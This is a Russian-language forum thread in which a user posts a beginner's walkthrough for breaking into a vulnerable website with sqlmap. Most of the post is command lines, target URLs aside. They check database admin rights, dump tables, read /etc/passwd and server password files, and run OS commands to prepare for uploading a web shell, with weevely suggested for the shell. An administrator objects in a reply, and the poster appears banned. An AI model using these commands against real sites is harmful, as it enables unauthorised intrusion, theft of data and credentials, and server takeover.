1. Рады видеть Вас на XenforoTest!

    У нас Вы можете скачать:

    Перед регистрацией рекомендую ознакомиться

    с Условиями скачивания определённых плагинов и Правилами форума.

    Присоединяйтесь! Учите и обучайтесь!

    Скрыть объявление

sqlmap для новичков

Тема в разделе "Информационная безопасность и информационные технологии", создана пользователем CyberWarning, 8 ноя 2015.

08.11.15 в 17:26
08.11.15 в 17:31
2
348
0
  1. CyberWarning

    CyberWarning rm -rf /dev/null/
    Забаненный

    Сообщения:
    40
    Симпатии:
    53
    Баллы:
    18
    Всем приветик ,начнем с того, что многие новички задаются вопросом как юзать sqlmap

    Начнем с самого простого ,например у нас есть уязвимый сайт ,который хотим поломать !

    Итак запускаем sqlmap -u

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    -o -b --current-user --is-dba

    1.png

    Следовательно
    current user: '[email protected]'
    current user is DBA: True если False , то шансов порутать серв мало

    Далее разворачиваем список таблиц в базе

    sqlmap -u

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    --columns --tables

    И перед Вами список таблиц ,например нам нужна таблица
    ap_element_options

    2.png

    Выполняем слудующий запрос

    sqlmap -u

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    -D machform -T ap_element_options --columns

    Перед Вами список из 8 колонок ,например мы хотим их полностью сохранить

    Выполняем следующий запрос

    sqlmap -u

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    -D machform -T ap_element_options -С option,position,aeo_id,element_id,form_id,live,option_id,option_is_default --dump-all --save

    3.png

    Читаем содержимое файлов на сервере !

    sqlmap -u

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    --file-read="/etc/passwd" --file-read="httpd/pass/httpd/passwd.conf" но могут быть и в других подразделах )

    4.png

    Выполним еще запросик небольшой )) Раскрывем пути ,куда в дальнейшем будем лить облочку вебшелла )

    sqlmap -u

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    --os-cmd=ls

    Дальше думаю Вам все понятно ! В крайнем соучае используем weevely для оболочки !

    Удачи
     
    #1 CyberWarning, 8 ноя 2015
    Последнее редактирование модератором: 9 ноя 2015
  2. Skaiman

    Skaiman [SVG]ADD-ONS ™
    Администратор

    Сообщения:
    4.461
    Симпатии:
    4.718
    Баллы:
    226
    Так лучше и пусть остаются на том же уровне. Зачем это, блин, что бы школота твой же сайт ломала?
     
  3. CyberWarning

    CyberWarning rm -rf /dev/null/
    Забаненный

    Сообщения:
    40
    Симпатии:
    53
    Баллы:
    18
    Ок ,как скажешь ШЕФ ;) хотя могу и дополнить ;)
     
Rambler's Top100 Яндекс.Метрика INTERKASSA